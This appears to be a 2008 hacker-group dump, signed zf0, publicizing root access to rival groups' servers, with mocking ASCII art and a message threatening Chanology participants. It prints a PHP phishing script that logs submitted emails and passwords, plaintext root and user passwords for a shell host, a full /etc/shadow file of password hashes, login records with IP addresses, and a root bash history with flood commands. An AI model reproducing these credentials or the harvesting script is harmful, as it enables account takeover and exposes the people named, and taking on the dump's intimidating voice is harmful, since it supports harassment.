# When you make changes to this configuration file, this will make
# sure that cached pages are cleared.
$configdate = gmdate( 'YmdHis', @filemtime( __FILE__ ) );
$wgCacheEpoch = max( $wgCacheEpoch, $configdate );
	
?>
$ cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
picatta:*:1001:1001:picatta:/home/picatta:/bin/sh
general:*:1002:1002:general:/home/general:/bin/sh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
$ ls -al /usr/home
total 8
drwxr-xr-x   4 root	wheel	 512 Mar  8 07:48 .
drwxr-xr-x  17 root	wheel	 512 Mar  8 07:48 ..
drwxr-xr-x   2 general	general  512 Mar  8 07:48 general
drwxr-xr-x   2 picatta	picatta  512 Mar  8 07:47 picatta
$ cd ~picatta
$ ls -al
total 20
drwxr-xr-x  2 picatta  picatta	512 Mar  8 07:47 .
drwxr-xr-x  4 root     wheel	512 Mar  8 07:48 ..
-rw-r--r--  1 picatta  picatta	751 Mar  8 07:47 .cshrc
-rw-r--r--  1 picatta  picatta	248 Mar  8 07:47 .login
-rw-r--r--  1 picatta  picatta	158 Mar  8 07:47 .login_conf
-rw-------  1 picatta  picatta	373 Mar  8 07:47 .mail_aliases
-rw-r--r--  1 picatta  picatta	331 Mar  8 07:47 .mailrc
-rw-r--r--  1 picatta  picatta	766 Mar  8 07:47 .profile
-rw-------  1 picatta  picatta	276 Mar  8 07:47 .rhosts
-rw-r--r--  1 picatta  picatta	975 Mar  8 07:47 .shrc
$ cd ~general
$ ls -al
total 20
drwxr-xr-x  2 general  general	512 Mar  8 07:48 .
drwxr-xr-x  4 root     wheel	512 Mar  8 07:48 ..
-rw-r--r--  1 general  general	751 Mar  8 07:48 .cshrc
-rw-r--r--  1 general  general	248 Mar  8 07:48 .login
-rw-r--r--  1 general  general	158 Mar  8 07:48 .login_conf
-rw-------  1 general  general	373 Mar  8 07:48 .mail_aliases
-rw-r--r--  1 general  general	331 Mar  8 07:48 .mailrc
-rw-r--r--  1 general  general	766 Mar  8 07:48 .profile
-rw-------  1 general  general	276 Mar  8 07:48 .rhosts
-rw-r--r--  1 general  general	975 Mar  8 07:48 .shrc
$ cd /usr/local/www/apache22/data/auth
$ ls -al
total 8
drwxr-xr-x   2 root  picatta   512 Mar	8 17:41 .
drwxr-xr-x  28 root  wheel    1536 Mar	8 22:01 ..
-rwxr-xr-x   1 root  picatta	 2 Mar	5 12:47 account.txt
-rwxr-xr-x   1 root  picatta   169 Mar	5 12:47 login.php
$ cat account.txt
:
$ cat login.php 
<?php
  $email = $_POST['email'];
  $password = $_POST['password'];
  $fw = fopen('account.txt', 'a');
  fwrite($fw, $email . ":" . $password . "/n");
  fclose($fw);
?>
$ ls -al /var/mail
total 4
drwxrwxr-x   2 root	mail	 512 Mar  8 22:05 .
drwxr-xr-x  24 root	wheel	 512 Mar  8 22:05 ..
-rw-------   1 cyrus	cyrus	   0 Mar  8 22:05 cyrus
-rw-------   1 general	general    0 Mar  8 07:48 general
-rw-------   1 mysql	mysql	   0 Mar  8 16:38 mysql
-rw-------   1 picatta	picatta    0 Mar  8 07:47 picatta
$

/*****************************************************************/

Well, that was fun...

Remember, you are not as untouchable as you think you are. As long as you have a
website up somewhere or are IRC'ing on public networks (btw, do you honestly
think that EFNet provides a secure communications channel?) you are within the
reach of those who would wish you harm. 

To be perfectly honest, you indoctrinate your members just as much as the
supposed evil CoS that you fight against. I honestly don't see the difference
between your methods and those that you allege they use. 

Your actions are childish. You attack sites and people that have done nothing 
to you and whom you have no battle with. Hell, a lot of the time you don't even
attack the right target. That speaks volumes about your collective abilities.

Again, we beseach you to remember that you are *not* untouchable. While 99% of
the time you will anger people who have no power to hit back, or who have 
no friends with the ability to retaliate, the remaining 1% of the time you will
anger people who can and will hurt you.

Knock off this Chanology crap and go back to posting on 4chan and playing 
CounterStrike. You're in a world you know nothing about and you do not belong 
here.

We would have dumped your MediaWiki DB but it was full of crap and only had 32
registered users.

This was for you X. Hopefully it helps.


#############################################################
#                     THE ADVENTURES OF                     #
#                __                                         #
#     .--------.|__|.----.----.-----.                       #
#     |        ||  ||  __|   _|  _  |                       #
#     |__|__|__||__||____|__| |_____|                       #
#                                             __            #
#                         .-----.-----.-----.|__|.-----.    #
#                         |  _  |  -__|     ||  ||__ --|    #
#                         |   __|_____|__|__||__||_____|    #
#                         |__|                              #
#                                                           #
#############################################################
#                      |      #  ________________________   #
#                      | [] []# |                        |  #
#                      |      # |<mp> r0fl3 i juST g0t   |  #
#  FUCK YOU! Co$!      | [] []# |bunCH of RFI's from b0ts|  #
#      /               |      # |i r teh le3ats          |  #
#       /              |  ____# |                        |  #
#     lulz O_O i just  |  |___# |<sk1d> LUCKY!!11!       |  #
#      raged you so    |      # |                        |  #
#      hard!!          | ?  __# '-.____________________.-'  #
#      /               |  o | #         |________|          #
#___8=D________________|__|_|_#  ______/__________/______   #
#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/# |________________________|  #
#                             #  |(type type)           |   #
#-  -  -  -  -  -  -  -  -  - #  |   / _____ _____      |   #
#                             #  |    /     '     /     |   #
#############################################################
#                      |      #                      |      #
# r0flzc0ptu3z i just  | [] []# SHUT UP Co$!!        | [] []#
#     /                |      #     /            Thats IT!  #
# swated that f4g and  | [] []#     /              / | [] []#
#      /               |      #      /    I'M CALLING|      #
#       /              |  ____#       /          /   |  ____#
#   dropp3d his doc's  |  |___#        /         The |  |___#
#     i iz so0         |Go    #        /            /|      #
#      l33t!!          |Away__#   Whats zf0no?      zf0no___#
#      /               | 'o | #      /               | 'o | #
#___8=D________________|__|_|_#___8=D________________|__|_|_#
#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/#
#                             #                             #
#-  -  -  -  -  -  -  -  -  - #-  -  -  -  -  -  -  -  -  - #
#                             #                             #
#############################################################
#                                                           #
#                  ,-.             __                       #
#                ,'   `---.___.---'  `.                     #
#              ,'   ,-                 `-._                 #
#            ,'    /                       /   .-           #
#         ,//     /  zf0 + Rhino => zf0no  // ((            #
#     )`._)>)     |                                     #
#     `>,'    _   /                  /       |/      *-_    #
#       )      /   |   |     zf04   |        | o        `-. #
#  ,   /        /  |    `.          |        |   o *   (`-' #
#/ /`-'          )-|      `.        |        /     '-  .'   #
#/`-`   .`     _/  / _     )`-.___.--/      /     O _`-._   #
#_/_         ,'_____/ `.__/___________`.    /_____,'^, c-)__#
#__/ ,    ,'/_/_/_/_//   /`/_/_/_/_/_/_//   /_/_/(_`-' ^-'`)#
#  /__   /           _) (               _) (   (^_  -    _ |#
#-  -`--' -  -  -  -/____/-  -  -  -  -/____/-(_,-.  8=D   |#
#                                                `-_______* #
#############################################################
#                                                           #
#   Once Again Micro Penis Is                               #
#                                             __            #
#              .-----.--.--.--.-----.-----.--|  |           #
#              |  _  |  |  |  |     |  -__|  _  |           #
#              |   __|________|__|__|_____|_____|           #
#              |__|                                         #
#                                               (c) zf0 2008#
#############################################################



zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0
zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
zf0                                                                                 zf0
zf0                                       g00ns                                     zf0
zf0                                                                                 zf0
zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0



z3r0 -> tribal: its possible someone hacked the user account 
z3r0 -> tribal: but doubtful
tribal -> z3r0: yeah but if thats true
tribal -> z3r0: they wouldn't be able to change the bash history

~~~~~~~~~~~~~~~~~~~~~~~~~~

Current g00ns shell passwords:

root:Yuh89Kiol0?
bnc:dwAFkCWx
barnseo:jatQeT77Q2be

~~~~~~~~~~~~~~~~~~~~~~~~~~


[root@demon2 ~]# uname -a; id
Linux demon2.rage-servers.com 2.6.22.9-grsec #11 SMP Mon Feb 11 22:15:20 PST 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@demon2 ~]# cat /etc/shadow
root:$1$eE12wKEE$tmHFeYudmmO3rwwe7l7Cj1:13917:0:99999:7:::
bin:*:13726:0:99999:7:::
daemon:*:13726:0:99999:7:::
adm:*:13726:0:99999:7:::
lp:*:13726:0:99999:7:::
sync:*:13726:0:99999:7:::
shutdown:*:13726:0:99999:7:::
halt:*:13726:0:99999:7:::
mail:*:13726:0:99999:7:::
news:*:13726:0:99999:7:::
uucp:*:13726:0:99999:7:::
operator:*:13726:0:99999:7:::
games:*:13726:0:99999:7:::
gopher:*:13726:0:99999:7:::
ftp:*:13726:0:99999:7:::
nobody:*:13726:0:99999:7:::
dbus:!!:13726:0:99999:7:::
mailnull:!!:13726:0:99999:7:::
smmsp:!!:13726:0:99999:7:::
nscd:!!:13726:0:99999:7:::
vcsa:!!:13726:0:99999:7:::
haldaemon:!!:13726:0:99999:7:::
rpc:!!:13726:0:99999:7:::
rpcuser:!!:13726:0:99999:7:::
nfsnobody:!!:13726:0:99999:7:::
sshd:!!:13726:0:99999:7:::
pcap:!!:13726:0:99999:7:::
rpm:!!:13726:0:99999:7:::
named:!!:13726::::::
apache:!!:13726::::::
diradmin:!!:13726::::::
mysql:!!:13726::::::
webapps:!!:13726:0:99999:7:::
majordomo:!!:13726::::::
admin:$1$k67PPtsg$vReIxhUQshkQHrgN8qop4/:13727:0:99999:7:::
barnseo:$1$eSkx8Cwh$l/eNlfFan8WqvNlt3CcJd/:13943:0:99999:7:::
bored:$1$VDoQ7SvP$hzgNmjDbAo1YV1UN1HnSa1:13727:0:99999:7:::
churc0:$1$tsI0iJf7$6NvNZKfpK/NMNbhrQTmlA0:13727:0:99999:7:::
connors:$1$2ULc9Bif$sujzvc6bBq/w9fUjMC/ru/:13727:0:99999:7:::
every:$1$wC6e9J4r$fHgJBV5mvsjDfu1mbP1ya1:13727:0:99999:7:::
evilcode:$1$w3V6Hy9R$Ulia4Vw0Ka2BppbF0/lH50:13732:0:99999:7:::
excodeirc:$1$rFGBHx30$NQBXJyn58wCMprwtX6zYw0:13774:0:99999:7:::
exploiterc:$1$VEmT3ImD$VxH8EvofWX8ewPX4M4wk00:13727:0:99999:7:::
felosii:$1$G2Mg7vW9$SoUIbysYX.nTApiriA6CC/:13727:0:99999:7:::
g00nsts395:$1$1joDOdxa$Us6bM7CJhw0BTgErxTI5p0:13748:0:99999:7:::
grumpy:$1$dX3cnqpU$oApeYwRlHfDpoG4RpaGwD.:13727:0:99999:7:::
illmob:$1$gFYsh9oD$LVzfHbh.UyLCGp/HoP2xC.:13727:0:99999:7:::
pingyill:$1$5b3IbBeK$pRofjZ3/JiBjPG3OYgP900:13727:0:99999:7:::
rageserver:$1$lI4HM14j$2vJACLQYNTxJDZ6GkJRBv0:13727:0:99999:7:::
robo:$1$u0sPxruz$eaFFqL4tnXsKcCOkrq2/O.:13727:0:99999:7:::
sn00g3s:$1$brOb0Seg$FGzBeV5S89j5AgDgYaRSG/:13970:0:99999:7:::
void:$1$tBjUtZVx$6Vzt0IHhNIQU8QLU6lymO/:13727:0:99999:7:::
alliancedn:$1$JitYsrIg$Mz0Q3fgnLDDmnEITkHB1t1:13727:0:99999:7:::
aosw:$1$2EhcyqE8$b2JIrTsCg6svFPqe4bSvB.:13727:0:99999:7:::
ntp:!!:13727::::::
hackrad:$1$pnZjslMq$F1X4eS3kW4DjnxNJq6l7w.:13727:0:99999:7:::
mycorp:$1$7PzKv9I_$SdcZN/fvAe5M1/g.nV3Ve/:13727:0:99999:7:::
ragedns:$1$0ZhTdSDG$8tIyV/igSTp2FW1DLg0bI.:13727:0:99999:7:::
shoutcas:$1$EyPac5O4$twiXOZ2pCQF2N02Yn1ysF/:13732:0:99999:7:::
g00ns83:$1$11pX9sPu$10H8SuDhVaqzctQl1hK/T.:13985:0:99999:7:::
avahi:!!:13728::::::
xfs:!!:13728::::::
bnc:$1$oJ272Xoy$A/YVfI3PIEVShTgTfBKVY1:13729:0:99999:7:::
felosi:$1$nsjb27Ih$r4cu3KkmTBUcHBnpKlcAd/:13729:0:99999:7:::
egg:$1$IhIgFiwf$ZbLk7EMZ2mW9h5SZ.mibv.:13735:0:99999:7:::
dougie:$1$xSp9e8mS$aiGml3legHEIUPrB5zyNp/:13737:0:99999:7:::
proc:!!:13748:0:99999:7:::
cstest:$1$ocq0fShx$6dKqaaMhVyvob5DW5sBeK1:13859:0:99999:7:::
partyvan:!!$1$lGkCPwxP$aaKltWujl.3mkQjqgKJ311:13864:0:99999:7:::
40zzz:$1$I1xSLk9k$0.mmuo5Si8UlQXaUJ4VRF1:13869:0:99999:7:::
tflux:$1$ftEvmzkA$RlkyQtPH.ebC0J8lWiZxm/:13875:0:99999:7:::
hthhost:$1$sdsbg7Bd$UaK2rXwsmZjwQYV8/4FUa1:13877:0:99999:7:::
party:$1$f2EVqqGx$H/sktpSQFCpoOz8tQpNsu/:13912:0:99999:7:::
silc:$1$dhGqC6Gf$UEHea6QzCwrkfB8ZB2gDV1:13897:0:99999:7:::
ident:!!:13910:0:99999:7:::
lost:$1$5EpPopQR$0klUI/mKzjxPR0CV7qp2f/:13926:0:99999:7:::
cunt:$1$7EyJ/1Qa$4Xy96JHb7dRjxxq.FDCsQ0:13947:0:99999:7:::
tribal:$1$qF0PcFfr$76GBdRhLgM5lEGpjZQLPL1:13947:0:99999:7:::
sixtyz:$1$9oLYqc3p$.KffXrzMGVAQ2bdOrgkoY1:13986:0:99999:7:::
hanon:$1$oQBfvCtT$LymNfsGG9wHkUwKn41Cim/:13961:0:99999:7:::
pvannet:$1$hYiASnKV$.CxXbIqEMR6kAoRRKVLfo1:13965:0:99999:7:::
[root@demon2 ~]# ps auxwww | grep -v root | grep -v mysql
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
ftp       2319  0.0  0.0   2736  1424 ?        Ss   Mar18   0:00 proftpd: (accepting connections)
dbus      3183  0.0  0.0   2784   672 ?        Ss   Feb11   0:00 dbus-daemon --system
mail      3813  0.0  0.0   8760   712 ?        Ss   Feb11   0:36 /usr/sbin/exim -bd -q15m -oP /var/run/exim.pid
avahi     4434  0.0  0.0   2600   648 ?        Ss   Feb11   0:00 avahi-daemon: running [demon2.local]
68        4450  0.0  0.0   5276   736 ?        Ss   Feb11   0:00 hald
named     4618  0.0  0.4  48712  8296 ?        Ssl  Feb11  55:55 /usr/sbin/named -u named
bnc       5470  0.0  0.0   5568  1560 ?        S    Feb11   0:53 ./psybnc
apache   12745  0.0  0.3 113532  7368 ?        Ss   Apr16   0:00 lsphp -c /usr/local/lib
bnc      14297  0.0  0.1   5544  2144 ?        S    Apr19   0:04 ./psybnc psybnc.gso.conf
nobody   15071  0.0  0.0   8708  1292 ?        Ss   Apr01   0:00 /usr/local/directadmin/directadmin d
510      16899  0.0  0.1   6728  3232 ?        S    Apr14   0:00 /home/excodeirc/Unreal3.2/src/ircd
evilcode 17493  0.0  0.8  19904 17704 ?        S    Apr19   1:08 /home/evilcode/newircd/Unreal3.2.7/src/ircd
egg      20683  0.0  0.2  17204  5172 ?        Sl   Apr14   7:14 ./eggdrop-1.6.18 v0ltr0n.conf
egg      20745  0.0  0.1  13380  3432 ?        Sl   Apr14   0:02 ./eggdrop sentry.conf
egg      20748  0.0  0.1  13544  3420 ?        Sl   Apr14   0:00 ./eggdrop boneless.conf
egg      20758  0.0  0.1  13404  3396 ?        Sl   Apr14   0:00 ./eggdrop keebler.conf
egg      20770  0.0  0.1   4412  3428 ?        Ss   Apr14   0:31 /home/egg/efnet/fight hacker
egg      20773  0.0  0.1   3548  2588 ?        Ss   Apr14   0:19 /home/egg/efnet/fight logic
egg      20776  0.0  0.1   3588  2692 ?        Ss   Apr14   0:17 /home/egg/efnet/fight bloo
egg      20779  0.0  0.1   3552  2640 ?        Ss   Apr14   0:18 /home/egg/efnet/fight etho
egg      20793  0.0  0.1   3564  2720 ?        Ss   Apr14   0:17 /home/egg/efnet/fight notgay
egg      20798  0.0  0.1   3576  2676 ?        Ss   Apr14   0:24 /home/egg/efnet/fight hthbot
513      23089  0.0  0.1  73380  2388 ?        SNl  Apr16   0:26 ./server_linux
513      23913  0.0  0.2  50844  5016 ?        SNl  Apr16   0:00 ./server_linux -PID=tsserver2.pid
apache   28366  0.0  0.6 121208 14104 ?        S    13:11   0:00 lsphp -c /usr/local/lib
nobody   29950  0.0  0.0   8708   572 ?        S    Apr20   0:00 /usr/local/directadmin/directadmin d
nobody   29960  0.0  0.0   8708   572 ?        S    Apr20   0:00 /usr/local/directadmin/directadmin d
g00ns83  29999  0.0  0.5 114628 10976 ?        S    13:26   0:00 lsphp -c /usr/local/lib
sn00g3s  30011  0.9  0.5 114844 11788 ?        S    13:26   0:00 lsphp -c /usr/local/lib
every    30024  1.6  0.5 114452 12264 ?        S    13:26   0:00 lsphp -c /usr/local/lib
nobody   30111  0.0  0.0   8708   572 ?        S    Apr20   0:00 /usr/local/directadmin/directadmin d
nobody   30168  0.0  0.0   8708   572 ?        S    Apr20   0:00 /usr/local/directadmin/directadmin d
nobody   30170  0.0  0.0   8708   572 ?        S    Apr20   0:00 /usr/local/directadmin/directadmin d
apache   32186  0.0  0.6  16400 12960 ?        S    Apr16   4:36 lshttpd
[root@demon2 ~]# ls -al
total 18128
drwxr-x--- 14 root root     4096 Mar 27 16:14 .
drwxr-xr-x 27 root root     4096 Mar 11 00:10 ..
-rw-r--r--  1 root root 16777216 Sep 17  2004 16mb.test.file.zip
-rw-------  1 root root     1077 Jul 31  2007 anaconda-ks.cfg
drwxr-xr-x  2 root root     4096 Sep 13  2007 ani
-rw-------  1 root root     9305 Apr 21 13:23 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root   337529 Apr 17  2006 Bastille-3.0.9-1.0.noarch.rpm
drwxrwxrwx  5 1000 1000    12288 Mar 17 19:47 c-ares-1.5.1
-rw-r--r--  1 root root   445312 Nov 21 02:14 c-ares-1.5.1.tar.gz
-rw-r--r--  1 root root    20136 Dec 19 19:30 cores
drwxr-xr-x  4 root root     4096 Feb 23 19:17 .cpan
drwxr-xr-x  5 root root     4096 Feb 10 12:56 csf
-rw-r--r--  1 root root   238005 Jan 21 09:19 csf.tgz
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
drwx------  2 root root     4096 Jan 25 16:29 .elinks
-rw-r--r--  1 root root     8192 Jan  6 17:37 flood
-rw-r--r--  1 root root    13333 Jul 31  2007 install.log
-rw-r--r--  1 root root     2551 Jul 31  2007 install.log.syslog
-rw-r--r--  1 root root    12033 Jan  6 17:30 ips
-rw-------  1 root root       45 Apr 19 14:04 .lesshst
drwxr-xr-x  4 root root     4096 Dec 31 01:35 lynis
-rw-r--r--  1 root root    46388 Dec 26 11:13 lynis-1.0.6.tar.gz
-rw-r--r--  1 root root      754 Feb 10 17:12 Makefile
-rw-r--r--  1 root root        0 Feb 10 17:12 Module.symvers
-rw-------  1 root root       41 Jan 31 02:49 .my.cnf
-rw-------  1 root root      419 Sep 29  2007 .nessusrc
-rw-r--r--  1 root root       51 Sep 29  2007 .nessusrc.cert
-rw-r--r--  1 root root      656 Jan  6 17:37 new
-rw-r--r--  1 root root      656 Jan  6 17:38 new1
drwxr-xr-x  3 root root     4096 Mar 25 13:40 newircd
-rw-r--r--  1 root root     1462 Aug 19  2007 opt.php
-rw-r--r--  1 root root     3502 Feb 10 16:03 ptpatch2008.c
-rw-r--r--  1 root root     5704 Feb 10 17:12 ptpatch2008.ko
-rw-r--r--  1 root root      126 Feb 10 17:12 .ptpatch2008.ko.cmd
-rw-r--r--  1 root root      870 Feb 10 17:12 ptpatch2008.mod.c
-rw-r--r--  1 root root     3404 Feb 10 17:12 ptpatch2008.mod.o
-rw-r--r--  1 root root    11168 Feb 10 17:12 .ptpatch2008.mod.o.cmd
-rw-r--r--  1 root root     3080 Feb 10 17:12 ptpatch2008.o
-rw-r--r--  1 root root    16774 Feb 10 17:12 .ptpatch2008.o.cmd
drwxrwxr-x  3  666  666     4096 Sep 22  2007 rkhunter-1.3.0
-rw-r--r--  1 root root   252011 Sep 22  2007 rkhunter-1.3.0.tar.gz
-rw-------  1 root root     1024 Jan 31 05:43 .rnd
drwxr-xr-x  4 1000 1000     4096 Nov 29 14:48 rootcheck-0.7
-rw-r--r--  1 root root    42488 Mar 17  2006 rootcheck-0.7.tar.gz
drwx------  2 root root     4096 Feb 10 12:55 .ssh
drwxr-x---  2 root root     4096 Dec 11 17:39 .steam
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
drwxr-xr-x  2 root root     4096 Feb 10 17:12 .tmp_versions
-rw-r--r--  1 root root    42596 Aug  9  2007 tuning-primer.sh
-rw-r--r--  1 root root    11623 Jan  6 17:36 udpflood
-rw-r--r--  1 root root    12033 Jan  6 17:30 udpips
[root@demon2 ~]# last -n 30
root     pts/1        74-34-107-191.ds Mon Apr 21 03:44 - 13:23  (09:39)    
andrei@t ftpd27076    99.146.188.71    Sun Apr 20 17:01 - 17:07  (00:05)    
andrei@t ftpd21033    99.146.188.71    Sun Apr 20 16:06 - 16:11  (00:05)    
andrei@t ftpd18185    99.146.188.71    Sun Apr 20 15:40 - 15:56  (00:15)    
andrei@t ftpd14422    99.146.188.71    Sun Apr 20 15:04 - 15:20  (00:16)    
every    ftpd13689    76.189.145.31    Sun Apr 20 09:56 - 10:03  (00:07)    
bnc      pts/1        78.129.174.155   Sat Apr 19 20:27 - 20:31  (00:04)    
bnc      pts/1        78.129.174.155   Sat Apr 19 17:53 - 18:39  (00:45)    
bnc      pts/2        78.129.174.155   Sat Apr 19 15:03 - 15:06  (00:02)    
root     pts/2        ip70-180-48-83.b Sat Apr 19 10:35 - 11:25  (00:50)    
every    ftpd20255    76.189.145.31    Fri Apr 18 15:42 - 15:42  (00:00)    
every    ftpd18019    76.189.145.31    Fri Apr 18 15:26 - 15:41  (00:15)    
root     pts/0        fl-71-51-173-254 Wed Apr 16 19:52 - 20:43  (00:50)    
andrei@t ftpd32363    99.146.188.71    Wed Apr 16 17:33 - 17:37  (00:04)    
root     pts/0        fl-71-51-173-254 Wed Apr 16 17:28 - 19:09  (01:41)    
andrei@t ftpd30547    99.146.188.71    Wed Apr 16 17:18 - 17:29  (00:11)    
andrei@t ftpd30546    99.146.188.71    Wed Apr 16 17:18 - 17:23  (00:05)    
root     pts/0        fl-71-51-173-254 Tue Apr 15 21:14 - 21:57  (00:42)    
root     pts/0        fl-71-51-173-254 Mon Apr 14 22:23 - 23:11  (00:47)    
root     pts/0        fl-71-51-173-254 Mon Apr 14 13:46 - 14:28  (00:42)    
kl@60z.o ftpd10215    77.221.133.186   Mon Apr 14 00:32 - 00:32  (00:00)    
andrei@t ftpd19694    99.146.188.71    Sun Apr 13 20:40 - 20:45  (00:05)    
andrei@t ftpd12210    99.146.188.71    Sun Apr 13 19:22 - 19:36  (00:13)    
andrei@t ftpd10428    99.146.188.71    Sun Apr 13 19:03 - 19:11  (00:07)    
andrei@t ftpd9290     99.146.188.71    Sun Apr 13 18:52 - 18:57  (00:05)    
andrei@t ftpd9291     99.146.188.71    Sun Apr 13 18:52 - 18:57  (00:05)    
root     pts/0        ip70-180-48-83.b Sat Apr 12 11:39 - 11:40  (00:00)    
root     pts/0        ip70-180-48-83.b Sat Apr 12 10:02 - 10:06  (00:03)    
root     pts/0        fl-71-51-173-254 Thu Apr 10 13:32 - 13:45  (00:12)    
root     pts/0        fl-71-51-173-254 Mon Apr  7 17:43 - 18:36  (00:53)    

wtmp begins Sun Mar  2 09:43:08 2008
[root@demon2 ~]# cat /etc/issue
CentOS release 5 (Final)
Kernel /r on an /m

[root@demon2 ~]# cat .bash_history
w
passwd g00ns83
top
w
cd /home
ls
ls pr0be
cd g00ns83
ls
cd public_html
ls
nano in.php
ls katalyst/
nano includes/config.php
nano includes/config.php
chown includes/config.php g00ns83
chown g00ns83 includes/config.php
ls includes
ls -o includes
ls
ls -o
ls image -o
ls -o image
chown g00ns83 *
ls
ls
cd /
ls
makeuser cunt
adduser cunt
passwd cunt
s
ls
cd /home/sn00g3s
cd public_Html
cd public_html
ls
mkdir hid
nano hid/index.php
chown sn00g3s 
chown sn00g3s *
ls
ls -o
ls hid
rm -rf hid
cd /home/g00ns83/public_Html
cd /home/g00ns83/public_html
ls
mkdir tribal
cd tribal
nano index.php
rm index.php
nano index.php
rm index.php
nano index.php
rm index.php
nano index.php
cd /home/g00ns83
chown g00ns83 *
w
ls -o
cd /home
passwd cunt
cd /home/cunt
ls
wget http://www.shoutcast.com/downloads/sc1-9-8/sc_serv_1.9.8_Linux.tar.gz
ls
tar -xzf sc_serv_1.9.8_Linux.tar.gz 
ls
nano sc_serv.conf
sudo cunt
su cunt
ls
cd unrealold/
ls
cd /home/excodeirc
ls
cd Unreal
cd Unreal3.2
ls
nano unrealircd.conf
ls
ls -o
cd /home/evilcodeirc
cd /home
ls
cd evilcode
ls
cd Unreal3.2/
ls
nano unrealircd.conf
cd /home/excodeirc
cd Unreal3.2
ls
nano unrealircd.conf
ls -o
cd /hom
ls
cd /home
ls
ls -o
ls tmp
ls asbestos
cd asbestos
cd domains
ls
cd asbestosbeware.org
ls
cd /
ls
w
ls tmp
ls
ps -aux | grep ircd
netstat | grep ircd
ls
netstat
ddos
ddos
csf -d 24.3.92.79
nano /etc/csf/csf.allow
csf -d 24.3.92.79
csf -r
csf -d 24.3.92.79
csf
csf -c
csf -r
csf -d 24.3.92.79
nano /etc/csf/csf.allow
csf -d 24.3.92.79
ddos
syn
synall
ls
ls -o
ls root
cd /home/pr0be
ls
rm -rf irssi-0.8.12
rm irssi-0.8.12.tar.gz 
ls
userdel
userdel -f pr0be
cd /home
ls
useradd tribal
passwd
ls
chown cunt *
su cunt
w
passwd tribal
ls
nano /etc/passwd
cd /home/tribal
ls
su tribal
ls
cd /home/tribal
ls
su tribal
ls
w
cd /
ls
nano /etc/csf/csf.deny
csf -r
cd /home
ls
cd excodeirc/
ls
cd Unreal
cd Unreal3.2
ls
nano unrealircd.conf
nano unrealircd.conf
cd /home
ls
cd evilcode/
ls
cd Unreal3.2/
ls
nano unrealircd.conf 
make install
su tribal
w
ls
who
cd /home/excodeirc
ls
cd Unreal3.2
ls
nano unrealircd.conf
cd /home/evilcodeirc
cd /home/evilcoders
cd /home
ls
cd evilcode/
ls
cd Unreal3.2/
ls
nano unrealircd.conf 
nano unrealircd.conf 
cd /home/excodeirc
ls
cd Unreal3.2
ls
nano unrealircd.conf
nano unrealircd.conf
nano /etc/csf/csf.deny
csf -a 24.205.142.108 /etc/csf
w
ddos
ddos
csf -r
syn
ls
ls
w
ddos
netstat
w
who
ls
cd /
ls
ls etc
ls var
ls bin
ls * | grep ddos
synd
ls
nano /etc/csf/csf.deny
nst | grep 72.20.26.211
netstat | grep 72.20.26.211
tcodump -nn -vv 72.20.26.211
tcpdump -nn -vv 72.20.26.211
netstat | grep 72.20.26.211
w
netstat | grep 72.20.26.211
w
dos
ls
ddos syng
ddos synd
ps -aux
kill -9 5174
ls
ps -aux
ls
ls /home
ls
cd /home/evilcode
ls
cd Unreal3.2
ls
./unreal
./unreal start
ps -aux
kill -9 3549
ps -aux
ls
ls ../
ls
ls ../../
su evilcode
ps -aux
ps -aux
ls
cd ../
ls
cd ../
ls
cd evilcode
ls
cd Unreal3.2
ls
nano unrealircd.conf
ls
cd ../../
ls
cd excodeirc
ls
cd Unreal3.2
ls
nano unrealircd.conf
su excodeirc
w
cd /home/excodeirc
netstat
ls
cd Unreal3.2
ls
nano unrealircd.conf
